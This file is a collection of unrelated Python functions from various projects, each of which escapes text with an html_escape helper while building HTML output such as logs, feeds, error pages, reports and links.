def flatten_el(el, include_hrefs, skip_tag=False): """ Takes an lxml element el, and generates all the text chunks for that tag. Each start tag is a chunk, each word is a chunk, and each end tag is a chunk. If skip_tag is true, then the outermost container tag is not returned (just its contents).""" if not skip_tag: if el.tag == 'img': yield ('img', el.get('src'), start_tag(el)) else: yield start_tag(el) if el.tag in empty_tags and not el.text and not len(el) and not el.tail: return start_words = split_words(el.text) for word in start_words: yield html_escape(word) for child in el: for item in flatten_el(child, include_hrefs=include_hrefs): yield item if el.tag == 'a' and el.get('href') and include_hrefs: yield ('href', el.get('href')) if not skip_tag: yield end_tag(el) end_words = split_words(el.tail) for word in end_words: yield html_escape(word)
def convert_to_html(self, line: str) -> str: """Convert style tags to html""" chunks = tag_split_re.split(line) if len(chunks) == 1: # optimization in case there are no markup tags in the text at all return html_escape(self.smartquotes(line), False) result = [] close_tags_stack = [] chunks.append("</>") # add a reset-all-styles sentinel for chunk in chunks: html_tags = style_tags_html.get(chunk) if html_tags: chunk = html_tags[0] close_tags_stack.append(html_tags[1]) elif chunk == "</>": while close_tags_stack: result.append(close_tags_stack.pop()) continue elif chunk == "<clear>": self.append_html_special("clear") elif chunk: if chunk.startswith("</"): chunk = "<" + chunk[2:] html_tags = style_tags_html.get(chunk) if html_tags: chunk = html_tags[1] if close_tags_stack: close_tags_stack.pop() else: # normal text (not a tag) chunk = html_escape(self.smartquotes(chunk), False) result.append(chunk) return "".join(result)
def assert_not_in_resps(n, resps): posts_resp, archive_resp = resps self.assertNotIn(html_escape(title.format(n)), posts_resp.data) self.assertNotIn(text.format(n), posts_resp.data) self.assertNotIn(slug.format(n), posts_resp.data) self.assertNotIn(html_escape(title.format(n)), archive_resp.data) self.assertNotIn(slug.format(n), archive_resp.data)
def _format_label(self, fmt, strokes, translation): if strokes: strokes = ', '.join(self._special_fmt % html_escape('/'.join(s)) for s in sort_steno_strokes(strokes)) if translation: translation = self._special_fmt % html_escape(escape_translation(translation)) return fmt.format(strokes=strokes, translation=translation)
def doLog(self, irc, channel, notice, nick, s, *args): ''' notice: Boolean. True if message should be styled as a notice. ''' if not self.registryValue('enable', channel): return s = format(s, *args) channel = self.normalizeChannel(irc, channel) log = self.getLog(irc, channel) row_classes = row_class if notice: row_classes = row_class + " " + notice_class log.write('<p class="%s">' % row_classes) if self.registryValue('timestamp', channel): log.write('<span class="%s">' % timestamp_class) self.timestamp(log) log.write('</span>') if nick != None: log.write('<span class="%s">' % nick_class) log.write(html_escape("<%s> " %nick)) log.write('</span>') if self.registryValue('stripFormatting', channel): s = ircutils.stripFormatting(s) log.write('<span class="%s">' % message_class) log.write(self.linkify(html_escape(s))) log.write('</span>') log.write('</p>\n') if self.registryValue('flushImmediately'): log.flush()
def escape_attribute(value: EscapableEntity) -> str: """Escape HTML attributes. For example: replace '"' with '"', '<' with '<'. This code is slow. Works on str and unicode without changing the type. Also works on things that can be converted with '%s'. Args: value: Examples: >>> escape_attribute("Hello this is <b>dog</b>!") 'Hello this is <b>dog</b>!' >>> escape_attribute("Hello this is <foo>dog</foo>!") 'Hello this is <foo>dog</foo>!' Returns: """ attr_type = type(value) if value is None: return '' if attr_type == int: return str(value) if isinstance(value, HTML): return str(value) # This is HTML code which must not be escaped if isinstance(attr_type, str): return html_escape(value, quote=True) if isinstance(attr_type, bytes): # TODO: Not in the signature! return html_escape(ensure_str(value), quote=True) # TODO: What is this case for? Exception? return html_escape(str(value), quote=True) # TODO: Not in the signature!
def generate_html_redirect_page(target_url, msg='', delay_sec=1): """生成一个HTML重定向页面 某些浏览器在301/302页面不接受cookies, 所以需要用html重定向页面来传cookie :type target_url: str :type msg: str :type delay_sec: int :rtype: Response """ resp_content = r"""<!doctype html> <html lang="zh-CN"> <head> <meta charset="UTF-8"> <title>重定向 (Page Redirect)</title> <meta http-equiv="refresh" content="%d; url=%s"> <script>setTimeout(function(){location.href="%s"} , %d000);</script> </head> <body> <pre>%s</pre> <hr /> You are now redirecting to <a href="%s">%s</a>, if it didn't redirect automatically, please click that link. </body> </html>""" % ( delay_sec, html_escape(target_url), html_escape(target_url), delay_sec + 1, html_escape(msg), html_escape(target_url), html_escape(target_url) ) resp_content = resp_content.encode('utf-8') return Response(response=resp_content)
def get_jabbers(self, uri, uri2=None): ''' return a text and html variant for Jabber stuff ''' res = [] if len(self.lsrs) == 0: return res wfo = self.source[1:] url = self.get_url(uri) for mylsr in self.lsrs: if mylsr.duplicate: continue time_fmt = "%-I:%M %p" url = "%s#%s/%s/%s" % (uri, mylsr.wfo, mylsr.utcvalid.strftime("%Y%m%d%H%M"), mylsr.utcvalid.strftime("%Y%m%d%H%M")) if mylsr.valid.day != self.utcnow.day: time_fmt = "%-d %b, %-I:%M %p" xtra = dict(product_id=self.get_product_id(), channels="LSR%s,LSR.ALL,LSR.%s" % (mylsr.wfo, mylsr.typetext.replace(" ", "_")), geometry='POINT(%s %s)' % (mylsr.get_lon(), mylsr.get_lat()), ptype=mylsr.get_dbtype(), valid=mylsr.utcvalid.strftime("%Y%m%dT%H:%M:00"), category='LSR', twitter="%s %s" % (mylsr.tweet(), url), lat=str(mylsr.get_lat()), long=str(mylsr.get_lon())) html = ("<p>%s [%s Co, %s] %s <a href=\"%s\">reports %s</a> at " "%s %s -- %s</p>") % ( _mylowercase(mylsr.city), mylsr.county.title(), mylsr.state, mylsr.source, url, mylsr.mag_string(), mylsr.valid.strftime(time_fmt), self.z, html_escape(mylsr.remark)) plain = "%s [%s Co, %s] %s reports %s at %s %s -- %s %s" % ( _mylowercase(mylsr.city), mylsr.county.title(), mylsr.state, mylsr.source, mylsr.mag_string(), mylsr.valid.strftime(time_fmt), self.z, html_escape(mylsr.remark), url) res.append([plain, html, xtra]) if self.is_summary(): extra_text = "" if self.duplicates > 0: extra_text = (", %s out of %s reports were previously " "sent and not repeated here.") % ( self.duplicates, len(self.lsrs)) text = "%s: %s issues Summary Local Storm Report %s %s" % ( wfo, wfo, extra_text, url) html = ("<p>%s issues " "<a href='%s'>Summary Local Storm Report</a>%s</p>") % ( wfo, url, extra_text) xtra = { 'product_id': self.get_product_id(), 'channels': 'LSR%s' % (wfo, ), } res.append([text, html, xtra]) return res
def test_feed(self): rv = self.client.get('/feed/') self.assertEqual(rv.status_code, 200) perpage = self.client.application.config['POST_FEED_PERPAGE'] title = '<h1>This</h1> is Title {0}' text = '<span>this</span> is text {0}' slug = 'this-is-slug-{0}' self.login_as_admin() for n in range(perpage + 3, 0, -1): self.add_post(title=title.format(n), text=text.format(n), slug=slug.format(n)) user = self.logout() author_name = user['name'] rv = self.client.get('/feed/') self.assertEqual(rv.status_code, 200) # make sure it renders the first POST_FEED_PERPAGE posts only for n in range(perpage + 3, 0, -1): if n <= perpage: self.assertIn(html_escape(title.format(n)), rv.data) self.assertIn(html_escape(text.format(n)), rv.data) self.assertIn(slug.format(n), rv.data) self.assertIn(author_name, rv.data) else: self.assertNotIn(html_escape(title.format(n)), rv.data) self.assertNotIn(html_escape(text.format(n)), rv.data) self.assertNotIn(slug.format(n), rv.data)
def flatten_el(el, include_hrefs, skip_tag=False, skipped_elements=[]): """ Takes an lxml element el, and generates all the text chunks for that tag. Each start tag is a chunk, each word is a chunk, and each end tag is a chunk. If skip_tag is true, then the outermost container tag is not returned (just its contents).""" if el in skipped_elements: yield skipped_tag(el) return if not skip_tag: if el.tag == 'img': yield ('img', el.get('src'), start_tag(el)) else: yield start_tag(el) if el.tag in empty_tags and not el.text and not len(el) and not el.tail: return start_words = split_words(el.text) for word in start_words: yield html_escape(word) for child in el: for item in flatten_el(child, include_hrefs=include_hrefs, skipped_elements=skipped_elements): yield item if el.tag == 'a' and el.get('href') and include_hrefs: yield ('href', el.get('href')) if not skip_tag: yield end_tag(el) end_words = split_words(el.tail) for word in end_words: yield html_escape(word)
def format_item(name: str, error: str) -> str: return """ <li class="argument"> <span class="argument-name">{name}</span>: <span class="error-message">{error}</span> </li> """.format( name=html_escape(name), error=html_escape(error) )
def _format_label(self, fmt, strokes, translation): if strokes: strokes = ', '.join(self._special_fmt % html_escape('/'.join(s)) for s in sort_steno_strokes(strokes)) if translation: translation = self._special_fmt % html_escape( escape_translation(translation)) return fmt.format(strokes=strokes, translation=translation)
def _listobjs(self, objs, name): if objs: yield "<p>{} {}(s):</p>".format(len(objs), name) yield "<ul>" for o in sorted(objs, key=attrgetter("name")): title = html_escape(o.name) url = html_escape("{}/{}".format(self.url, url_escape(o.name))) yield '<li><a href="{}">{}</a></li>'.format(url, title) yield "</ul><br/>"
def get_html_link(url, text, link_type=None): attrs = '' if link_type == 'pdf': attrs = ' target="_blank"' html = dedent("""\ <a href="{url}"{attrs}> {text}</a>""".format(attrs=attrs, text=html_escape(text), url=html_escape(url))) return html
def _format_label(self, fmt, strokes, translation=None, filename=None): if strokes: strokes = ', '.join(self._special_fmt % html_escape('/'.join(s)) for s in sort_steno_strokes(strokes)) if translation: translation = self._special_fmt_bold % html_escape(escape_translation(translation)) if filename: filename = html_escape(filename) return fmt.format(strokes=strokes, translation=translation, filename=filename)
def _str_sample_term(term, query_info): if "inline_query" in query_info: original_iq = query_info["inline_query"] sub_dict = { k: v for (k, v) in zip(query_info["query"][0][0].args, term.args) } return "[%s]" % html_escape(str(original_iq.apply(sub_dict))) else: return html_escape(str(term))
def list_users(): # Make sure that every user in he user_email_pref table also has a # a user name in user_prefs table. We can probably find a better place # to put this. c = cfg.pdk_db.execute( " SELECT DISTINCT username FROM user_email_pref WHERE " " username NOT IN ( SELECT username FROM user_prefs ) ") for x, in c: print("user %s not in user_prefs table - adding<br>" % html_escape(x)) cfg.pdk_db.execute( "INSERT INTO user_prefs ( username ) VALUES ( :1 )", (x,)) cfg.pdk_db.commit() # Make a table showing all the user prefs. tb = text_table.text_table() tb.define_column('username') tb.define_column('email') row = 0 # find all the project names that anybody knows about. This list is # only chosen from those projects that somebody has asked to get email # about, so it can look in the user preferences instead of searching all # the results for project names. project = [] c = cfg.pdk_db.execute( "SELECT DISTINCT project FROM user_email_pref ORDER BY project") for (x,) in c: project.append(x) tb.define_column('p.' + x, showname=x) # for each user, add a row to the table c = cfg.pdk_db.execute( "SELECT username, email FROM user_prefs ORDER BY username") for user, email in c: # stuff the fixed material into the table tb.set_value(row, 0, user) tb.set_value(row, 1, email) # find for each project that this user has a preference about: c1 = cfg.pdk_db.execute( "SELECT project, format, maxlines FROM user_email_pref WHERE username = :1", (user, )) for p, f, m in c1: # stuff that preference into the table. if m is not None: f = '%s %s' % (f, m) tb.set_value(row, 'p.' + p, html_escape(f)) row = row + 1 tb.set_html_table_attributes('border=1') output.write(tb.get_html())
def put(self, entry, path): self.stream.write('<item><title>') title, entry = entry.lstrip('\n').split('\n', 1) self.stream.write(html_escape(title.format(**{'title':NOPFmt()}))) # FIXME: Assumes title is the first nonblank line self.stream.write('</title>\n<description>\n') entry = entry.replace('\n\n', '\n<br/>\n') entry = entry.format(**colors.make_html_colors_dict()) entry = html_escape(entry) self.stream.write(entry) self.stream.write('</description>\n<link>https://www.themanaworld.org/news-feed.php#' + url_escape(path) + '</link>\n<guid isPermaLink="false">') self.stream.write(path) self.stream.write('</guid>\n</item>\n')
def html_quote(value, force=True): if not force and hasattr(value, '__html__'): return value.__html__() if value is None: return '' if not isinstance(value, basestring_): value = coerce_text(value) if isinstance(value, bytes): value = html_escape(value.decode('latin1'), 1) value = value.encode('latin1') else: value = html_escape(value, 1) return value
def to_html(self, with_body=True, stylesheet="css/style.css"): html = [] for cell in self.book["cells"]: if cell["cell_type"] == "markdown": md = "".join(cell["source"]) if md: html.append(markdown.markdown(md.strip())) if cell["cell_type"] == "code": source = "".join(cell["source"]) if source and "NotebookConverter" not in source: html.append(self.python_to_html(source)) if cell.get("outputs"): for output in cell["outputs"]: if "text/html" in output.get("data", {}): outp = "".join(output["data"]["text/html"]) if outp: html.append(self._fix_html(outp)) elif "text/plain" in output.get("data", {}): outp = "".join(output["data"]["text/plain"]) if outp: html.append( '<div class="output"><pre>%s</pre></div>' % html_escape(outp)) if "text" in output: outp = "".join(output["text"]) if outp: html.append( '<div class="output"><pre>%s</pre></div>' % html_escape(outp)) #print("------", output) html = "\n".join("<!-- output #%s -->\n%s\n" % t for t in enumerate(html)) if with_body: html = """ <!doctype html> <html> <head profile="http://www.w3.org/2005/10/profile"> <meta charset="utf-8"> <link href="css/highlight.css" rel="stylesheet" type="text/css" /> <link href="%s" rel="stylesheet" type="text/css" /> </head> <body> <div class="page"> %s </div> </body> </html>""" % (stylesheet, html) return html
def pisaErrorDocument(dest, c): out = pisaTempFile(capacity=c.capacity) out.write("<p style='background-color:red;'><strong>%d error(s) occured:</strong><p>" % c.err) for mode, line, msg, _ in c.log: if mode == "error": out.write("<pre>%s in line %d: %s</pre>" % (mode, line, html_escape(msg))) out.write("<p><strong>%d warning(s) occured:</strong><p>" % c.warn) for mode, line, msg, _ in c.log: if mode == "warning": out.write("<p>%s in line %d: %s</p>" % (mode, line, html_escape(msg))) return pisaDocument(out.getvalue(), dest, raise_exception=False)
def convertDesc(val, encode=True): if val is not None: if encode is True: if PY3: return html_escape(val, quote=True).replace(u'\x8a', '\n') else: return html_escape(six.text_type(val, 'utf_8', errors='ignore').encode('utf_8', 'ignore'), quote=True).replace(u'\x8a', '\n') else: # remove control chars val = removeBadChars(six.ensure_binary(val)) if PY3: return val.decode('utf_8', errors='ignore') else: return six.text_type(val, 'utf_8', errors='ignore').encode('utf_8', 'ignore') return val
def write_result(self, url_data): """Write url_data.result.""" if url_data.valid: self.write(u'<tr><td class="valid">') self.write(self.part("result")) self.write(u'</td><td class="valid">') self.write(html_escape(_("Valid"))) else: self.write(u'<tr><td class="error">') self.write(self.part("result")) self.write(u'</td><td class="error">') self.write(html_escape(_("Error"))) if url_data.result: self.write(u": " + html_escape(url_data.result)) self.writeln(u"</td></tr>")
def flagok(key_id, trans_id): c = pdk_db.execute( 'SELECT host, location, test_name FROM result_scalar WHERE key_id = :1 ', (key_id, )) x = c.fetchone() if x is None: noflag('key_id ' + str(key_id), 'no such key_id') return 1 (host, location, test_name) = x c = pdk_db.execute( 'SELECT value FROM result_tda WHERE key_id = :1 AND name = :2 ', (key_id, '_okfile')) x = c.fetchone() if x is None: flagok_file = None else: (flagok_file, ) = x if flagok_file is None or flagok_file == '': noflag(test_name, 'no _okfile tda') return 1 if location is None or location == '': noflag(test_name, 'location not known') return 1 if host is None or host == '': noflag(test_name, 'host not known') return 1 if not os.path.isabs(flagok_file): # os.path.join ignores the directory if the filename is full qualified flagok_file = os.path.join(os.path.dirname(location), flagok_file) flagfile = pandokia.cfg.flagok_file % host print( "OK %s %s %s<br>" % (html_escape(str(test_name)), html_escape(str(flagok_file)), flagfile)) pdk_db.execute("update result_scalar set attn = 'N' where key_id = :1 ", (key_id, )) pdk_db.execute( "INSERT INTO ok_items (key_id, trans_id, status) values (:1, :2, :3)", (key_id, trans_id, 'new'))
def html_quote(value, force=True): if not force and hasattr(value, '__html__'): return value.__html__() if value is None: return '' if not isinstance(value, basestring_): value = coerce_text(value) if sys.version >= "3" and isinstance(value, bytes): value = html_escape(value.decode('latin1'), 1) value = value.encode('latin1') else: value = html_escape(value, 1) if sys.version < "3": if is_unicode(value): value = value.encode('ascii', 'xmlcharrefreplace') return value
def handle_error(self, request, status=500, exc=None, message=None): """Handle errors. Returns HTTP response with specific status code. Logs additional information. It always closes current connection.""" self.log_exception("Error handling request", exc_info=exc) if status == 500: msg = "<h1>500 Internal Server Error</h1>" if self.debug: with suppress(Exception): tb = traceback.format_exc() tb = html_escape(tb) msg += '<br><h2>Traceback:</h2>\n<pre>' msg += tb msg += '</pre>' else: msg += "Server got itself in trouble" msg = ("<html><head><title>500 Internal Server Error</title>" "</head><body>" + msg + "</body></html>") else: msg = message resp = Response(status=status, text=msg, content_type='text/html') resp.force_close() # some data already got sent, connection is broken if request.writer.output_size > 0 or self.transport is None: self.force_close() return resp
def do_GET(self): # Default message if we don't know a name. message = "I don't know you yet!" # Look for a cookie in the request. if 'cookie' in self.headers: try: # 2. Extract and decode the cookie. # Get the cookie from the headers and extract its value # into a variable called 'name'. # Craft a message, escaping any HTML special chars in name. message = "Hey there, " + html_escape(name) except (KeyError, cookies.CookieError) as e: message = "I'm not sure who you are!" print(e) # First, send a 200 OK response. self.send_response(200) # Then send headers. self.send_header('Content-type', 'text/html; charset=utf-8') self.end_headers() # Send the form with the message in it. mesg = form.format(message) self.wfile.write(mesg.encode())
def get_jabbers(self, uri, uri2=None): """Return plain text and html variants for a Jabber msg Args: uri (str): URL number one needed for constructing the URI uri2 (str): not used, but needed for the over-ride Returns: (list): List of lists, plain text, html text, xtra dict """ # convert htmlentities spcuri = html_escape(self.get_url()) center = 'Storm Prediction Center' pextra = '' if self.afos == 'FFGMPD': center = 'Weather Prediction Center' pextra = 'Precipitation ' prob_extra = " " if self.watch_prob is not None: prob_extra = " [watch probability: %.0f%%] " % (self.watch_prob,) plain = ("%s issues Mesoscale %sDiscussion #%s%s%s" ) % (center, pextra, self.discussion_num, prob_extra, spcuri) html = ('<p>%s issues <a href="%s">' 'Mesoscale %sDiscussion #%s</a>%s' '(<a href="%s?pid=%s">View text</a>)</p>' ) % (center, spcuri, pextra, self.discussion_num, prob_extra, uri, self.get_product_id()) channels = self.get_channels() channels.extend(["%s.%s" % (self.afos, w) for w in self.attn_wfo]) channels.extend(["%s.%s" % (self.afos, w) for w in self.attn_rfc]) channels.extend(["%s.%s" % (self.afos, w) for w in self.cwsus]) xtra = dict(channels=",".join(channels), product_id=self.get_product_id(), twitter=self.tweet()) return [[plain, html, xtra], ]
def graved_global_link(reference, object_, path, linker): """ Converts the given graved global reference link to it's html text form. Parameters ---------- reference : `str` A reference, what's link should be clickable. object_ : ``UnitBase`` instance The respective object. path : ``QualPath`` Path of the respective object to avoid incorrect link generation in subclasses. linker : `func` Function, which creates a relative link between two units. Returns ------- html : `str` """ reference_escaped = html_escape(reference) referred_object = object_.lookup_reference(reference) if referred_object is None: return '<code>' '<span>' f'{reference_escaped}' '</span>' '</code>' url = linker(path, referred_object.path) return (f'<a href="{url}">' '<code>' '<span>' f'{reference_escaped}' '</span>' '</code>' '</a>')
def do_GET(self): # Default message if we don't know a name. message = "I don't know you yet!" # Look for a cookie in the request. if 'cookie' in self.headers: try: # 2. Extract and decode the cookie. # Get the cookie from the headers and extract its value c = cookies.SimpleCookie(self.headers['cookie']) name = c['yourname'].value # Craft a message, escaping any HTML special chars in name. message = "Hey there, " + html_escape(name) except (KeyError, cookies.CookieError) as e: message = "I'm not sure who you are!" print(e) # First, send a 200 OK response. self.send_response(200) # Then send headers. self.send_header('Content-type', 'text/html; charset=utf-8') self.end_headers() # Send the form with the message in it. mesg = form.format(message) self.wfile.write(mesg.encode())
def _input(self, environ, parameters, start_response): session = environ["wsgi.session"] conn = session.get("player_connection") if not conn: return self.internal_server_error_500(start_response, "not logged in") # Get the action the user wants to perform. If the user is logging in this will contain the # username and password provided so 'action' is a bit of a misnomer is some edge cases. action = parameters.get("input", "") action = html_escape(action, False) if action: # Allows us to support the 'input-noecho' input form and refrain from sending passwords # back to the browser. if conn.io.dont_echo_next: conn.io.dont_echo_next = False # We always echo the user's input back to their client wrapped with tags the client can # use to determine who best to handle user input history. The exception is when the input-noecho # form is used to mask passwords. else: conn.io.html_to_browser.append("<userinput>%s</userinput>" % action) # Save the input to the player object associated with the connection conn.player.store_input_line(action) start_response('200 OK', [('Content-Type', 'text/plain')]) return []
def do_GET(self): message = "I don't know your age!" # Look for a cookie in the request. if 'cookie' in self.headers: try: c = cookies.SimpleCookie(self.headers['cookie']) age = c['age'].value # Craft a message, escaping any HTML special chars in name. message = "Hey there, your age is " + html_escape(age) except (KeyError, cookies.CookieError) as e: message = "I'm not sure about your age!" print(e) # First, send a 200 OK response. self.send_response(200) # Then send headers. self.send_header('Content-type', 'text/html; charset=utf-8') self.end_headers() # Send the form with the message in it. mesg = form.format(message) self.wfile.write(mesg.encode())
def _escape(self, text): """Escape text according to self.escape""" ret = EMPTYSTRING if text is None else str(text) if self.escape: return html_escape(ret) else: return ret
def _make_ancestor_tree(self, person): """Make SVG picture for parent tree. Parameters ---------- person : `ged4py.model.Individual` INDI record Returns ------- html : `list` [ `str` ] SVG data (HTML contents), list of strings. """ width = self._page_width ^ 'px' tree = AncestorTree(person, max_gen=self._tree_width, width=width, gen_dist="12pt", font_size="9pt") visitor = SVGTreeVisitor(units='px', fullxml=False) tree.visit(visitor) img = visitor.makeSVG(width=tree.width, height=tree.height) doc = [] if img is not None: tree_svg = img[0] hdr = self._tr.tr(TR("Ancestor tree")) doc += ['<h3>' + html_escape(hdr) + '</h3>\n'] doc += ['<div class="centered">\n'] doc += [tree_svg] doc += ['</div>\n'] else: doc += ['<svg width="100%" height="1pt"/>\n'] return doc
def get_back_path(unit): parts = [(unit.name, '#')] counter = 1 while True: unit = unit.parent if unit is None: break parts.append((unit.name, '../' * counter + quote(unit.name))) counter += 1 continue result = [] index = len(parts) - 1 while True: name, url = parts[index] result.append('<a href="') result.append(url) result.append('">') result.append(html_escape(name)) result.append('</a>') if index == 0: break index -= 1 result.append(' / ') continue return ''.join(result)
def serialize(self): """ Serializes the attribute section to html string parts. This method is a generator. Yields ------ html : `str` """ path = self.path name = path.parts[-1] prefix = get_anchor_prefix_for(path) tier = get_tier_for(path) yield '<h' yield str(tier) yield '>' yield from anchor_for_serializer(anchor_escape(prefix)) yield html_escape(name) yield '<div class="underline"><div></h' yield str(tier) yield '>' if tier > 1: yield '<div class="sub_unit">' for section in self.sections: yield from section.serialize() if tier > 1: yield '</div>' return
def get_jabbers(self, uri=None, uri2=None): """ get jabber messages """ res = [] for report in self.reports: if report.is_duplicate or report.valid is None: continue jmsg = {'priority': 'Urgent' if report.priority == 'UUA' else 'Routine', 'ts': report.valid.strftime("%H%M"), 'report': html_escape(report.text), 'color': '#ff0000' if report.priority == 'UUA' else '#00ff00'} plain = "%(priority)s pilot report at %(ts)sZ: %(report)s" % jmsg html = ("<span style='color:%(color)s;'>%(priority)s pilot " "report</span> at %(ts)sZ: %(report)s") % jmsg xtra = {'channels': '%s.%s,%s.PIREP' % (report.priority, report.cwsu, report.priority), 'geometry': 'POINT(%s %s)' % (report.longitude, report.latitude), 'ptype': report.priority, 'category': 'PIREP', 'twitter': plain[:140], 'valid': report.valid.strftime("%Y%m%dT%H:%M:00")} res.append([plain, html, xtra]) return res
def afterFlowable(self, flowable): # Does the flowable contain fragments? if getattr(flowable, "outline", False): self.notify('TOCEntry', ( flowable.outlineLevel, html_escape(copy.deepcopy(flowable.text), 1), self.page))
def html_escape_context(context: Dict[str, str]) -> Dict[str, str]: unescaped_variables = { "CONTACTALIAS", "CONTACTNAME", "CONTACTEMAIL", "PARAMETER_INSERT_HTML_SECTION", "PARAMETER_BULK_SUBJECT", "PARAMETER_HOST_SUBJECT", "PARAMETER_SERVICE_SUBJECT", "PARAMETER_FROM_ADDRESS", "PARAMETER_FROM_DISPLAY_NAME", "PARAMETER_REPLY_TO", "PARAMETER_REPLY_TO_ADDRESS", "PARAMETER_REPLY_TO_DISPLAY_NAME", } if context.get("SERVICE_ESCAPE_PLUGIN_OUTPUT") == "0": unescaped_variables |= {"SERVICEOUTPUT", "LONGSERVICEOUTPUT"} if context.get("HOST_ESCAPE_PLUGIN_OUTPUT") == "0": unescaped_variables |= {"HOSTOUTPUT", "LONGHOSTOUTPUT"} return { variable: html_escape(value) if variable not in unescaped_variables else value for variable, value in context.items() }
def write(self, html): html.write("<ul>\n") for k, v in self.contents.items(): html.write("<li><code>%s</code>\n" % k) if isinstance(v, Directory): html.write("<strong>%s</strong>\n" % v.count) v.write(html) else: a, rel, b = v html.write( "<div>\n<p><code>%s</code> %s <code>%s</code></p>\n" % (a["url"], rel, b["url"])) for side in [a, b]: html.write("<img src='data:image/png;base64,%s'>\n" % side["screenshot"]) url = side["url"] prefix = "/_mozilla/" if url.startswith(prefix): filename = "mozilla/tests/" + url[len(prefix):] elif url == "about:blank": src = "" filename = None else: filename = "web-platform-tests" + url if filename: with open(filename, encoding="utf-8") as f: src = html_escape(f.read()) html.write( "<pre><code class=language-html>%s</code></pre>\n" % src) html.write("</li>\n") html.write("</ul>\n")
def start_tag(el): """ The text representation of the start tag for a tag. """ return '<%s%s>' % ( el.tag, ''.join([' %s="%s"' % (name, html_escape(value, True)) for name, value in el.attrib.items()]))
def makeHtmlNodes(nodes, sgg, prefixes, local, root_iri, root): htmlNodes = {} for k, v in nodes.items(): if ':' in k and not k.startswith('http') and not k.startswith('file'): prefix, suffix = k.split(':') prefix = prefix.strip('\x1b[91m') # colors :/ if sgg is not None and not suffix and k == root: # FIXME 268 url = os.path.join(sgg._basePath, 'vocabulary', 'id', quote(root_iri, safe=[])) #root_iri.replace('/','%2F').replace('#','%23')) elif sgg is not None and local: url = os.path.join(sgg._basePath, 'vocabulary', 'id', k) elif prefix == '_' and v is None: log.warning(f'BLANK NODES HAVE ENTERED THE DATABASE {root_iri}') v = 'BLANK NODE' else: try: url = str(prefixes[prefix]) + suffix except KeyError as e: log.exception(e) url = k else: if sgg is not None and local: url = os.path.join(sgg._basePath, 'vocabulary', 'id', quote(k, safe=[])) #k.replace('/','%2F').replace('#','%23')) else: url = k if v is None: # if there is no label fail over to the url v = f'<{url}>' htmlNodes[k] = '<a target="_blank" href="{}">{}</a>'.format(url, html_escape(v)) return htmlNodes
def _render_section(self, level, ref_id, title, newpage=False): # docstring inherited from base class self._toc += [(level, ref_id, title)] doc = ['<h{0} id="{1}">{2}</h{0}>\n'.format(level, ref_id, html_escape(title))] for line in doc: self._output.write(line.encode('utf-8'))
def file_ul(request): sess = DBSession() try: ff_id = request.POST['ffid'] except KeyError: ff_id = None folder = None if ff_id: ff_id = int(ff_id) folder = sess.query(FileFolder).get(ff_id) if folder and not folder.can_write(request.user): raise ValueError('Folder access denied') for fo in request.POST.getall('file'): obj = File( user_id=request.user.id, user=request.user, group_id=request.user.group.id, group=request.user.group, rights=F_DEFAULT_FILES ) if fo.filename: obj.name = obj.filename = fo.filename obj.folder = folder sess.add(obj) obj.set_from_file(fo.file, request.user, sess) res = Response(html_escape(json.dumps({ 'success' : True, 'msg' : 'File(s) uploaded' }), False)) res.headerlist.append(('X-Frame-Options', 'SAMEORIGIN')) return res
def commenter_link(self, obj): if obj is None or not obj.pk: return "(None)" return '<a href="/admin/blog/commenter/{}/">{}</a>'.format( obj.commenter.pk, html_escape(obj.commenter.ip_hash), )
def render_html(self): if self.body is None: return "" data = self.render_data for k, v in iteritems(data): if k != "code": data[k] = html_escape(v) return self.body.safe_substitute(data)
def start_tag(el): """ The text representation of the start tag for a tag. """ split_text = split_whitespace(el.text or "")[1][0] return '<%s%s>%s' % ( el.tag, ''.join([' %s="%s"' % (name, html_escape(value, True)) for name, value in el.attrib.items()]), split_text)
def generate_heading(self, fun): """Generate a heading for the top of the iprofile.""" if fun is None: heading = "<h3>Summary</h3>" else: try: heading = "{} (Calls: {}, Time: {})" heading = heading.format(fun.co_name, self.cprofile_tree[fun]['callcount'], self.cprofile_tree[fun]['totaltime']) heading = html_escape(heading) heading = "<h3>" + heading + "</h3>" heading += ("<p>From file: " + html_escape(fun.co_filename) + "</p>") except AttributeError: heading = "<h3>" + html_escape(fun) + "</h3>" self.value_heading = heading
def handle_error(self, status=500, message=None, payload=None, exc=None, headers=None, reason=None): """Handle errors. Returns HTTP response with specific status code. Logs additional information. It always closes current connection.""" if self.access_log: now = self._loop.time() try: if self.transport is None: # client has been disconnected during writing. return if status == 500: self.log_exception("Error handling request") try: if reason is None or reason == '': reason, msg = RESPONSES[status] else: msg = reason except KeyError: status = 500 reason, msg = '???', '' if self.debug and exc is not None: try: tb = traceback.format_exc() tb = html_escape(tb) msg += '<br><h2>Traceback:</h2>\n<pre>{}</pre>'.format(tb) except: pass html = DEFAULT_ERROR_MESSAGE.format( status=status, reason=reason, message=msg).encode('utf-8') response = Response( self.writer, status, close=True, loop=self._loop) response.add_header(hdrs.CONTENT_TYPE, 'text/html; charset=utf-8') response.add_header(hdrs.CONTENT_LENGTH, str(len(html))) response.add_header(hdrs.DATE, self._time_service.strtime()) if headers is not None: for name, value in headers: response.add_header(name, value) response.send_headers() response.write(html) # disable CORK, enable NODELAY if needed self.writer.set_tcp_nodelay(True) yield from response.write_eof() if self.access_log: self.log_access( message, None, response, self._loop.time() - now) finally: self.keep_alive(False)
def handle_request(self, message, payload): self._manager._requests_count += 1 if self.access_log: now = self._loop.time() request = self._request_factory(message, payload, self) self._request = request try: try: resp = yield from self._handler(request) except HTTPException as exc: resp = exc except Exception as exc: msg = "<h1>500 Internal Server Error</h1>" if self.debug: try: tb = traceback.format_exc() tb = html_escape(tb) msg += '<br><h2>Traceback:</h2>\n<pre>' msg += tb msg += '</pre>' except: # pragma: no cover pass else: msg += "Server got itself in trouble" msg = ("<html><head><title>500 Internal Server Error</title>" "</head><body>" + msg + "</body></html>") resp = HTTPInternalServerError(text=msg, content_type='text/html') self.logger.exception( "Error handling request", exc_info=exc) yield from resp.prepare(request) yield from resp.write_eof() finally: resp._task = None # notify server about keep-alive # assign to parent class attr self._keepalive = resp._keep_alive # Restore default state. # Should be no-op if server code didn't touch these attributes. self.writer.set_tcp_cork(False) self.writer.set_tcp_nodelay(True) # log access if self.access_log: self.log_access(message, None, resp, self._loop.time() - now) # for repr self._request = None
def text2html(txt): txt = txt.strip() if not txt: return '' def fill_link(match): return '<a href="{0}" target_="_blank">{0}</a>'.format(match.group()) htm = html_escape(txt) htm = link_re.sub(fill_link, htm) htm = '<pre>%s</pre>' % htm return htm
